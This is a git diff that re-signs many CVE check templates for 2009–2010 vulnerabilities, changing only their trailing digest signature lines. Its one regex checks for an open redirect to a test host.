4a0a00473045022100efe6e513aba3433f4ab0e1ef88eef287e7ee05c7abf8fb8ab86be22812dacaf002202412942f6b20de9136e4cd40ec9fcecc068f4830dc2e06810835f8d32346850a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index e7235dce6b..f60b8f63e8 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b7331565010d84c002b7cf2f7a86ffaad9ed7987a6af7ed386d0c1fdfc4a2870022100ad93d7312e808e09e1bafe8a62c52b228ef426c7d5a7dcce76a2d12acb50c0fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9c3e6842d7f2bd870dfaccb44cf7967e101052b3c7d1f03127000e7910fae26022100de227729def8c5184e4407e309b448a502c7ee7eb2d00d96cbd5ee0dd88a864d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index bbf1e2c67b..aedfce43ac 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e3ee0cfc04525ca64e6f63073fa38f5db6ee44776907c68d8f5e190a19649a9a022100c21acec79450886ccc34a6c7737411102d641536ee3d33788522fb5fd5cf6f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb00fd3c4ce5a26ed6ab80d774267c399a5e2335eea586b3738ef156824058df022066feb85d7c51ff28bc5fbfaf7b0223531b5ec997f1dbcac45c0bdfefb62af202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index df2d6fec55..2085401446 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201cc2638735aba64e480061e91a176acb1c5f885f26e50501697f8b444a66148b022075cccef4a1b6548b587c832158f624aa4192a98032f60e9f65fa9f9ec519b465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b15ae99c1d3ca2f1233aaf0e788295b69ad7e6ae16c2b9fba81288856eb9a80d022100c80b87d9c65025ddf0900359653ba13d0908fe452d36752aa801ad1e761dcf47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 502852583f..12954e5e22 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022201edc111a0f266f0cf4c0d27ad5fab474e474c3089690ad2ced0012bfaaa5022100e9a88bf679f5d29f8d752596eb8e02f41fc06863def5fadeea4f4aa13a50c2c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index e352e67234..1bd35cc90f 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f4ff2ab58c70983fdbde0ee6860d7cb8229e81af51ace5e3e15533082c69a2d022072359ac609c3461da4901b3bb8ccaf83fcf42ccd7e480a74fec618aadba9dcfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ffa1c79f56c51843e4ae33aade889343bc08e2cd48e34c96a18b426025d6fe8022100f0293ac85b2c273b5a96d641fd43b6aedb6c0408da0ddd0729d63ca2e87e81ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 38dd989db7..6aaf2895d7 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033efcff5dab3e96c4bd25ffd1f08b5d509129b21c1952b48f4c5f5bce1845b20022100dc3da12554c6710754770645dcafc258f15112fee5ae614da245894df5d37c91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc0516314760341830b6d829ac3d71cca66d790eed97e8c05aecafcac46e6b47022100c7ad39fcf6a99cad4066323df1b8cea073d37e4621111901fca6e3879bac4fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 16f308ded0..c63bf2f5e1 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022049a324c195808d1ac76829b45e8f27b6cd31e1527fcbe5131d00a009b78b98b7022100e3e31759811d9e4b4f7781ef77c85f6e426853daf5f1d8eaf52e966c01f8a88e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f696085a166eff1a9f78532c3fe14ed4163e59d9a96908e4ec91a0ee7bed142102210087f7ea06c03263d733dbbe87ff98cd03fba93940a5c21b9f889f1e6440fdc566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 76737ccb6b..ff6e05ec42 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3a39a822ed7fbffac4de0f1b0254ff4507f47002fe439be08c0983ec7a8613d022100958197a26e1b207a6910133f8e31baf385295e45ef9b589a8961292891f251c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440221008b9b59ffe3a50d64b3f18bb536f33fd35a3ab75c754ae5c347a93e5d240d4935021f796f07c35c8be0129aea12df6402810bd7a4197f0e7223ddc3a8488839c308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index dad40d4d75..0cc9627d7f 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022020268f779e361916bc07ce33e39192307f3bce053f3a189e088b1f836199e7ca02201a54a5155fcfc628c13a0d8282ac74dba004ed58582cdf30fad1985c90f82252:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220228cf9600a1dd63059d5e2ae690546f448bb168b4aac5013ee1511b66f279402022100c2aed62495d6728080edeb426772b88be9b02b07d3c183921755b2758ef70cbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 2935467205..7ec6beb698 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008359d835a31bb6cdf1904ec4e2657c736624dfcfa5fcd01f3a02a8257d33048d02204b9552e1cb25efd557234b0af9313dd2f5474de89c5865b764178e1d4d38905e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ff5ab30f4234618c6cb8ff8937b8c3f026fa22540c30e4723be09fd9a170bd7022018299b594c95012ccccd91e2464086eb0b75f168ba8b37e2befe9afb330da921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index e1db833941..d95f88f4a9 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220548521f736459dae087d6a2bd94e3ae9773f5b831cff83356187c4188522b8f802201265d0b432dbacee031aaaf9bcbc72699612e5e25f881527cde284df0d35481c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b69a0ddb75fe5a6e5e5da5c2cffef27949528448bd76ee69133c23453fe51e5e022100f835ef8902e4b818d7e38d065ff2246d9bad77fd846cd678376cc369edc01934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 44202e9809..909abd19f3 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205ee411e0df19bcb5be4939061e5b85f81c3ee3250e70223ecf19da638a332c6802207f1fbb956555429b3a2c32ad9d53e161530e3ebb76b3b8fafbc6483ff62c0d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057b70110c3230255acf102d97928955ea4da363451c17f6c961dc10b8888192e022100bbcfb911dd6c03f2fb6017baa145fe3fc559aff548f13cd010ead3675f18379a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index cfc44ddf1c..f23784557e 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c29bf12509751c6d4971b808635de57b7692d9e53df31d4b294649bb5ce456db022100bd518edc4ef976a87843b5cf5c4eec01353017a668000897cd0020a9fd09f094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100faf98bf9bc8f8cb6dedd82ccb2b5cf49ddafd0119858f6e6d38c60ee7d0e8caa02210090d3d8e293050de920c56613510427d16875207dd02019d3185c7209dd3d46b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index c673d75218..dfa30448fc 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d20ace89e5fba9e38e12b29dcdf7f94465027da5466716242a9d9a23d933a1b202200ead3153d09e06b648a9c10ea73a58a9c85db18e8c136d6d177acdccb61f00fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220027648d4d4ad81d25673691592a865aeba4edbbc49bb98f22254932f7cdf8396022100ec67dfc163a844ed2d62e9bd3f63faf0afa4b51563dd5801c7926ddfe9caa690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 7e80d29d30..def3364414 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e2ee5113ea7ef6e40728910e3d42e905985b5b2f7ce07d14947241170a9a1dc9022029c4419ef7ee627daa6f2d32119c452f396ae07a75d68bf757f8b36f3d72279e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015eb2f0633d1f1761aea73ac49a32a8c5f3f8d52eecf57edb76e58079036a216022047fcebd5259f4ddad0914d300ae4a4c5a374c3268897da3a734c54f4d85e3af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 5f0f38d9b7..f5d88de998 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022043fd12edb4a3a2a5476d0728b0371efefd549591b361970554bafd57766a5a7d0220319e614d046afdbc29519ddcf8c1b48b88a98655409e986e93b30e09366c7a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220728d14721e7ffc97ae9101ec0a228589c6011874540942b1d947853989146acc022018abc77016af7a2f966797453910f502c217cd7ceee10b418b87b92ab3463193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index ca5b99d766..7eb0ab1afe 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203e7b0577bb4c487c2041c049e54955ba57fcef21993bed3ee4a35397e5093009022012c708fe0fd04232b8a6542de8c0b947b5f72f266a2755b9ec230c1503415d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207c61a8164fb31e72e6d98d6260e87eac00a5d414c127812939b6c3d4d5a65df3022100dc45b24eeb28c01993ffca9fec8ecfffa0f755494cb81ecfa6a918a770c9f9e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index d659098372..2bacf238d4 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bdd3f2bcbf92f7f9b377bef80acf174a216abb0cb2acf3477efe856c2083c07702203e9b25701cd0278ddb795ca72e40c2c00dcb6e3924b009706b93a3f0d6416eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220724f85157044c11062097b6d4872436522fc35cb4dcf3b20b1f10d928f1d19e3022100adad2cda8f2a65281164fc4a29c8a5d4a93992b73827a47b74c5d1a3b0065733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 9ccb1a4504..7761bd9783 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a92c230e02820f5272be13d2ee12a3e2739ac81ac8868dfbbe2ff407522df0c0220517ba0c636efa561e00528f86bcb0cdb861bc0e5382c72f4cb8f11b5fffc3b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbfd8ea48c7ea963bf75e063f39dbb19633a7c111461cac4147532d71730a760022100831035f38425d12cc8628ada6e4deb423bc4abc0a38e3e8327de12cba5d4c203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 055b6fd1e4..571332b9ac 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c63f224a283f97a55ae4941e39f19ae06e9761cf123943f1b4d394ecef11ea9022100d2900835201e1b12398af58927fbaada9d98b609932bfc9f70d7c6263a16a705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100844dd8dd2eae03a8b5ffcd18a6903d89b7f1036f0e18a48b7d7a33905d9778dd022100b46694882b7e3cd5476bbb1f4cf5c11665b30414e1bc6de9889ce5c403770fcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index a37a5e8a6a..7473a66a17 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce9830af0a126d6aae7b0cbe9b7598011f30691e6f9066386c81c9fb4bf3c1bc022014f94fe6e238d285a780454bb05c33859277fe46440a3a38ce33dd5a9d376175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220494054249b8e4d7f93dbc0217e276a6b901834b92d67035bfbf8823272a12584022100cf4b2371066ea4cbcb01dcec2a5462226e0745a71aa82ef45e1702a49ee05d68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 566e691bbf..52679b2e54 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100caea4647de08403d53042f0568175efd2710e43a5d7e4962fcdb653206899ef802204d6c39e2e96c51b1626db9d90b0417e114debda8ef2844386f4faaa68630e512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bb985e9373625d3f78d831ec8f0ea16e5f05271a6a438f282ef535e526d2be9022100f8466a6d8c383a398c2c891afeefdcd309f332a76e51078dc142e1982b239bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index d8919a69c7..b656913c78 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210092cb1f73ab7dcae152bc21fe109528bd68ddf3cb5c508c1c4ba81eb03a062e0f022100d32c234d25d1101db43416910efd4e3e67f536d43d1ed0a150d56605181bc34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eadc940751fa801f31bd9431865a1348c1f01b754fdecf114d6900e0bc46966a022100a8eef2e4dd1939224c45d659610ed1d33481c91c5055014673be55c6c96f3e44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 931cc3a490..dec4bc95c4 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e223bbab6d530ae6a44d3bd78a373853c5148f44c8fc760b86463968a99c39260220014aad890aabb37a243d84a97dc63c543133a8974a8c00e2b56a558e85a93be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220531dcb18e8f2b71dbb39f860cc4850ffd43574870cced6d1c14fa79a91dcc92b022100b113da3738595c7563a2e04bdecc3d3e47efe77caef58b89fd6e5f8a590a5fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 879955f14d..78e7aee8ea 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078af0a2572ae5f8b2c1663f51eada15aaf88e88ddd86c86885239309dfc1cad3022004c0a80a0505a5b96aa016ae9b7c502555783290a05b5589d8a9677dcabefefe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220546ac5f56c9b94a44e941e632a9b307d80f472cc78e438065d385bcc5fec50c60221009b72878dc057fb94cdea625001bce4ecd0f230639b3f0a01e4fb43ac3892436e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index d657b8093c..c70c75a4af 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093ee4b75fd03b95c7cf1b62869f48b19b4cd257e9b6ee4e7a9ddd9ebdeba739f022100d1cd3032f304650a027ad4a1645ed98ff12691f89b7e9116d244291df5398606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205caacbaf2ced111a394d679ebcbfb86ab6f023380a04a9d6c7697916e3b76e43022056232dd3d5468b234d0d1cdaf03f2e753d6a0eadf807d281785b2f8c65dd7b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 1f7465f851..87d05d92fd 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eedf4edbfe23d403bdd5c5489b678f09c60e2a4eb686e7fa5f90c08137b92d54022100e22396a012f39f1ae9f4950b22031a7521a366a61411f98a4f3323782f5e2eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207de073fa377307af9bd3d0b3406ad3f9681feb1ca46031ccfcb6ed7561fc4a940220077be57fecc58376b676559e9e3dae1c8c8a0868e3d9b9654d949e981ad93d8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index e06e190f6d..497cc14171 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040ad70967db9eabb2f9a61956bb22a2cb03a60da3fd695753b8fc46da9eb48e3022071b38622330ce4f8a704bb116b35a8279a76512268663ad681d5360a49288372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220627c0439bed5f9c857145fb35f1a5e4152607d796e171b2b35aab09be7387341022066442ae0a3a5ca34a7cc9658c5644f13efdf60281a3652b3a95f493277194bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 6c457012db..665b8757a7 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081ae121f8d5b40c99be54953f4642587c68241fe48f2df08217c1a01ea61731502201393c0f1a4c9d6e00e2fd41022df88c7a15e3bc678a5eaf99634e69b735ab26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064230d9af661b0cb073113c4d0f724c89a82b08fcab9006563ef55a52a4825a40221009d1b17512cd61af4cc7e16ec02bb3451760585297295375e21604a3c784b1984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 70e02b87f1..ccbf3c44ed 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e094a51db98044850affaa030835374e20660764cfd65e9a367c5012aa6741c02207e065ab9927fef891678a4c7c425734e4e0c1c040f73d6e9a60c9ab7b3b9bfd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0eeca7aba4d9618dbe8ca061a7589c36f2b6768e904f2b92e36691632e3cc0a022100bcb42d40cbb3d6a870475dd714f9ca84ad666d622dac96e9707a9253f85c0183:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 35daa2bd86..0aa7d29812 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220671ba5beac4877f63605810ae5ba53e80578909ca33547f5bbc443a22f1920b2022100c4437f0060e149ac837e691a2ee6a12613e7a6ebfe5da8f49b5b52643d78af5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a5567b36fff3d03faf770d2c865bf1b403a7b30e0032dfcb49e1553a84bbde4022100f26f6975831ceea1e81e0270b4d70b1ac8619c87910f88580b2df1a75323344c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 9d241f2807..e7709b2dcc 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ad756a9e16380e027261fee411718753cfd8cbd153d923afa480c57a77e943d022100be3f9d60f33c780dec7263782e438f10d46f59b0c77a82743874dd0e9c03f65f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e7d67f69fd77bb7216c22fe8676faffb37290acbe3fd550615f33535360ee7102205db0d9e232af3096fb6bc570705058627696924b3e88bd65649940969e1ff061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 8aef850eec..8a50c2496a 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bcb3752f3f8e24379ea159e6831ebe01f2da83a0d58232453372c79b86e08221022100ed629a46f18c172871595fe7120c9aeb0f2441da744b940c59461cde7c96719a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f7d70491dc51a14478a027cf92cee4704418b3b61a36897ba1a3f8ea33bea0df02207acc9a7bd2d035f2e228ed04cf180acadef6a88c222bf92e62cb4b1672822672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 72dc18f295..04aec7c37b 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022044961916a557a8da30cac3ced56cc0b76c6ad56a135ccdeedda4e81e2bfea49e022027e20655fa3d414923eda4d6272299f0f4dd2cef72c8f74d3ba8b462a10c390a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0d75d2392e79829bfdf92b9806aaffe08721016c29f5e8f84e2cdfbfd700d12022100cdcc663f4843b1ee272e6c689afc5814092e36c1735e11ef0472b89bb472b7c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 9288a4e941..f4d1851069 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c47a4bdd67634653ce4da4af40c81205ffdcc542bbe4c92693d10063b0f15a6a02202182f5b7abe3de71edc4955d26840eeaaa624feab87fc896bee09c8bb5f97b8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9b34fe0a7da0582ef2dc9ed994e6f7c8805d5e3a7696068a29d89923a913df8022100869ef62055b34cb46a7e175e4df24c22713574e5763d263f77e84f873f33c6d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 34fe12b934..82e72f9219 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ecd7446fef1ce54e4f4248ba012aa11ea08e53dd3f5a36fa12d01852d0bf6cd5022100d86f62c4cc116ef4a60241471d37ff8b72ad493ced0d7e6002f1c5ac3db35856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201dc083bb694abd37e88974641d425a4eaf4eff49cd1a761d702b381aaf4996200220164ea38314a22108dcab83b2524a8f02609d718d0f5541633d753c2dc66ea34c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 9970e98d4a..dd684fe50d 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 